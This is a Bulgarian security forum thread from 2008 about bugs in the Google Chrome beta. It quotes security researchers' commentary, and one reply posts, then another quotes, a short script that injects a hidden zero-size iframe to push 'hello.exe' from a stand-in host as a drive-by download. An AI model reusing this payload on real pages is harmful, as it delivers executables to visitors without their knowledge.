Google Chrome с още повече бъгове

Новини в сферата на сигурността.

Google Chrome с още повече бъгове

Мнениеот kalata на Пон Сеп 08, 2008 12:24 pm

Вече запознати с бъговете Carpeting bomb, DoS крашовете няколко читателя изпратиха линкове към още бъгове на браузера на Гуугъл.

Първият от които е "automatic file download bug"

Виетнамски изследователи открили няколко бъга с "buffer overflow" и написали Demo exploits

Изследователя RSnake открил бъг в който Google му казват да напише собствен браузер:

If you build a browser in isolation, you don’t get the benefits and knowledge of the smart people who have come before you. Yes, Google’s browser is open source, like Firefox. But even Firefox came from Netscape, which had tons of background in the browser world, and Mozilla, too, has learned from a mistake or two. It is easy to call into question Google’s ability to build a safe browser given its rather poor track record in other areas of security. And no, you shouldn’t download it — not if you care about your security. So, like cryptography, you shouldn’t build a browser unless you really, really know what you’re doing.


Ivan Ristic с неговият бъг не успява да вбеси програмистите и PRите на Google.

The whole point of having a public beta release is expose a product to a wide audience and deal with the discovered problems prior to a stable release. The existence of security issues in Chrome is in line with our current inability to develop software free from security issues. Thus, people should not be distracted by the small problems that are now discovered. We should be looking at the big picture instead. Chrome is a browser that’s been designed from the ground up with security in mind. That’s bound to have a positive impact. We’ll know more about the impact once the details of its architecture surface.



Източник


Аватар
kalata
Tri-Pi-o
Tri-Pi-o
 
Мнения: 2764
Регистриран на: Пон Авг 04, 2008 12:43 pm
Местоположение: Ин дъ мидъл оф ноуер


Репутация: 57
Add reputation pointSubtract reputation point

Мнениеот metala на Пон Сеп 08, 2008 4:36 pm

Ето и още един брутален.

http://milw0rm.com/exploits/6355
Код: Избери целия код
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>


Аватар
metala
Red Label
 
Мнения: 436
Регистриран на: Вто Авг 05, 2008 8:24 am
Местоположение: E00000-FFFFFF


Репутация: 45
Add reputation pointSubtract reputation point

Мнениеот kalata на Пон Сеп 08, 2008 8:14 pm

Тоя последния е наистина брутален. Представяш ли си ?

<if browser=Google Chrome document.write("worm.exe"); >


:lol:


Аватар
kalata
Tri-Pi-o
Tri-Pi-o
 
Мнения: 2764
Регистриран на: Пон Авг 04, 2008 12:43 pm
Местоположение: Ин дъ мидъл оф ноуер


Репутация: 57
Add reputation pointSubtract reputation point

Мнениеот Blue на Пон Сеп 08, 2008 10:14 pm

metala написа:Ето и още един брутален.

http://milw0rm.com/exploits/6355
Код: Избери целия код
<script>
document.write('<iframe src="http://www.example.com/hello.exe" frameborder="0" width="0" height="0">');
</script>

Koщунство!!!!!
██████████████████████████████████████████████████████████████████
В една държава, която се управлява с разум, бедността и нищетата са срамни.
А в държава, която се управлява без разум, богатството и почестите са срамни!


Аватар
Blue
Dream of nature
 
Мнения: 185
Регистриран на: Сря Авг 06, 2008 9:25 am
Местоположение: В света на мойта реалност.


Репутация: 14
Add reputation pointSubtract reputation point


Назад към Сигурност


Подобни теми


Кой е на линия

Потребители разглеждащи този форум: 0 регистрирани и 0 госта